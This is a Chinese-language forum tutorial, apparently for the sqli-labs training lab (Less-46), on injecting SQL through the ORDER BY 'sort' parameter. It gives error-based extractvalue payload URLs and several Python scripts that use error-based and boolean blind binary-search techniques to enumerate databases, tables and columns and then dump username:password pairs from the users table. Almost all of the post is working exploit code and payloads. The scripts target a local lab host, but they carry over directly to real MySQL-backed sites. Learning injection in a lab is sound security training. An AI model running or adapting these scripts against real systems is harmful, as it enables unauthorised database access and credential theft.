马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?立即注册
x
目录
报错注入
直接注入
数据库名
数据库中的表名
users表结构:
users表数据:
python脚本注入
直接注入
获取数据库名
获取表名
获取表结构
获取数据
布尔盲注
获取数据库名
获取表名
获取表结构
获取数据
报错注入
直接注入
数据库名
当前数据库名:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select database() limit 1,1))))
系统数据库名:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata))))
长度限制,利用截取函数substr():
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),1,32))))
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),32,64))))
数据库中的表名
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'))))
同理利用截取函数substr():
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'),32,64))))
users表结构:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),1,32))))
users表数据:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,32))))
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),32,64))))
python脚本注入
直接注入
获取数据库名
- import requests
- import re
- target_url = "http://sqli-labs:8013/Less-46/"
- def extract_database_names():
- database_names = []
- index = 0
- while True:
- payload = {
- "sort": f"(extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {index},1))))"
- }
- try:
- response = requests.get(target_url, params=payload, timeout=10)
- response.raise_for_status()
- match = re.search(r"XPATH syntax error: '~([^']+)", response.text)
- if match:
- db_name = match.group(1)
- database_names.append(db_name)
- print(f"成功提取数据库名: {db_name}")
- index += 1
- elif index == 0:
- print("找到数据库名,可能漏洞不存在或错误信息被隐藏")
- break
- else:
- print("已提取所有数据库名")
- break
- except (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:
- print(f"[-] 请求错误,索引为 {index}: {e}")
- return database_names
- if __name__ == "__main__":
- all_database_names = extract_database_names()
复制代码
获取表名
- import requests
- import re
- target_url = "http://sqli-labs:8013/Less-46/"
- def extract_table_names(database_name):
- table_names = []
- index = 0
- while True:
- payload = {
- "sort": f"(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='{database_name}' limit {index},1))))"
- }
- try:
- response = requests.get(target_url, params=payload, timeout=10)
- response.raise_for_status()
- match = re.search(r"XPATH syntax error: '~([^']+)", response.text)
- if match:
- table_name = match.group(1)
- table_names.append(table_name)
- print(f"成功提取表名: {table_name}")
- index += 1
- elif index == 0:
- print("找到表名,可能漏洞不存在或错误信息被隐藏")
- break
- else:
- print("已提取所有表名")
- break
- except (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:
- print(f"[-] 请求错误,索引为 {index}: {e}")
- return table_names
- if __name__ == "__main__":
- database_name = "security" # 目标数据库名
- all_table_names = extract_table_names(database_name)
复制代码
获取表结构
- import requests
- import re
- target_url = "http://sqli-labs:8013/Less-46/"
- def extract_column_names(database_name, table_name):
- column_names = []
- index = 0
- while True:
- payload = {
- "sort": f"(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{database_name}' limit {index},1))))"
- }
- try:
- response = requests.get(target_url, params=payload, timeout=10)
- response.raise_for_status()
- match = re.search(r"XPATH syntax error: '~([^']+)", response.text)
- if match:
- column_name = match.group(1)
- column_names.append(column_name)
- print(f"成功提取列名: {column_name}")
- index += 1
- elif index == 0:
- print("找到列名,可能漏洞不存在或错误信息被隐藏")
- break
- else:
- print("已提取所有列名")
- break
- except (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:
- print(f"[-] 请求错误,索引为 {index}: {e}")
- return column_names
- if __name__ == "__main__":
- database_name = "security" # 目标数据库名
- table_name = "users" # 目标表名
- all_column_names = extract_column_names(database_name, table_name)
复制代码
获取数据
- import requests
- import re
- target_url="http://sqli-labs:8013/Less-46/"
- def extract_user_data(database_name, table_name, record_id):
- # 提取 username 和 password 的数据
- data={}
- # 获取 username
- payload_username={
- "sort": f"(extractvalue(1,concat(0x7e,(select username from {table_name} where id={record_id} limit 0,1))))"
- }
- # 获取 password
- payload_password={
- "sort": f"(extractvalue(1,concat(0x7e,(select password from {table_name} where id={record_id} limit 0,1))))"
- }
- try:
- response_username=requests.get(target_url, params=payload_username, timeout=10)
- response_username.raise_for_status()
- match_username=re.search(r"XPATH syntax error: '~([^']+)", response_username.text)
- response_password=requests.get(target_url, params=payload_password, timeout=10)
- response_password.raise_for_status()
- match_password=re.search(r"XPATH syntax error: '~([^']+)", response_password.text)
- if match_username and match_password:
- username=match_username.group(1)
- password=match_password.group(1)
- data={'username': username, 'password': password}
- print(f"{username}:{password}")
- except (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:
- print(f"[-] 请求错误,id={record_id}: {e}")
- return data
- if __name__ == "__main__":
- database_name="security" # 目标数据库名
- table_name="users" # 目标表名
- record_id=1 # 从 id=1 开始
- while True:
- print(f"正在提取 id={record_id} 的数据...")
- user_data=extract_user_data(database_name, table_name, record_id)
- if not user_data: # 如果没有提取到数据,则跳出循环
- print("没有更多数据,提取结束。")
- break
- record_id+=1 # 继续下一个 id
复制代码
布尔盲注
获取数据库名
- import requests
- from bs4 import BeautifulSoup
- # 获取页面中的用户名(用于判断SQL注入是否成功)
- def get_username(resp):
- soup = BeautifulSoup(resp, 'html.parser')
- try:
- username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
- except IndexError:
- username = ""
- return username
- # 向目标URL发送请求并返回响应
- def send_request(url):
- try:
- resp = requests.get(url)
- return resp
- except requests.RequestException as e:
- print(f"Request error: {e}")
- return None
- # 获取数据库名
- def get_database_name():
- database_name = ''
- i = 1
- while True:
- left = 32
- right = 127
- mid = (left + right) // 2
- while left < right:
- url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
- resp = send_request(url)
- if resp and 'Dumb' == get_username(resp.text):
- left = mid + 1
- else:
- right = mid
- mid = (left + right) // 2
- if mid == 32:
- break
- database_name += chr(mid)
- i += 1
- print(f"Database Name: {database_name}")
- if __name__ == '__main__':
- get_database_name()
复制代码
获取表名
- import requests
- from bs4 import BeautifulSoup
- # 获取页面中的用户名(用于判断SQL注入是否成功)
- def get_username(resp):
- soup = BeautifulSoup(resp, 'html.parser')
- try:
- username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
- except IndexError:
- username = ""
- return username
- # 向目标URL发送请求并返回响应
- def send_request(url):
- try:
- resp = requests.get(url)
- return resp
- except requests.RequestException as e:
- print(f"Request error: {e}")
- return None
- # 获取表名
- def get_table_names():
- tables = ''
- i = 1
- while True:
- left = 32
- right = 127
- mid = (left + right) // 2
- while left < right:
- url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(table_name) from \
- information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "
- resp = send_request(url)
- if resp and 'Dumb' == get_username(resp.text):
- left = mid + 1
- else:
- right = mid
- mid = (left + right) // 2
- if mid == 32:
- break
- tables += chr(mid)
- i += 1
- print(f"Tables: {tables}")
- if __name__ == '__main__':
- get_table_names()
复制代码
获取表结构
- import requests
- from bs4 import BeautifulSoup
- # 获取页面中的用户名(用于判断SQL注入是否成功)
- def get_username(resp):
- soup = BeautifulSoup(resp, 'html.parser')
- try:
- username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
- except IndexError:
- username = ""
- return username
- # 向目标URL发送请求并返回响应
- def send_request(url):
- try:
- resp = requests.get(url)
- return resp
- except requests.RequestException as e:
- print(f"Request error: {e}")
- return None
- # 获取列名
- def get_column_names():
- columns = ''
- i = 1
- while True:
- left = 32
- right = 127
- mid = (left + right) // 2
- while left < right:
- url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(column_name) from \
- information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- "
- resp = send_request(url)
- if resp and 'Dumb' == get_username(resp.text):
- left = mid + 1
- else:
- right = mid
- mid = (left + right) // 2
- if mid == 32:
- break
- columns += chr(mid)
- i += 1
- print(f"Columns in 'users': {columns}")
- if __name__ == '__main__':
- get_column_names()
复制代码
获取数据
- import requests
- from bs4 import BeautifulSoup
- # 获取页面中的用户名(用于判断SQL注入是否成功)
- def get_username(resp):
- soup = BeautifulSoup(resp, 'html.parser')
- try:
- username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
- except IndexError:
- username = ""
- return username
- # 向目标URL发送请求并返回响应
- def send_request(url):
- try:
- resp = requests.get(url)
- return resp
- except requests.RequestException as e:
- print(f"Request error: {e}")
- return None
- # 获取数据(如用户名:密码)
- def get_user_data():
- user_data = ''
- i = 1
- while True:
- left = 32
- right = 127
- mid = (left + right) // 2
- while left < right:
- url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(username,':',password) \
- from users),{i},1))>{mid},id,username) -- "
- resp = send_request(url)
- if resp and 'Dumb' == get_username(resp.text):
- left = mid + 1
- else:
- right = mid
- mid = (left + right) // 2
- if mid == 32:
- break
- user_data += chr(mid)
- i += 1
- print(f"User Data (username:password): {user_data}")
- if __name__ == '__main__':
- get_user_data()
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |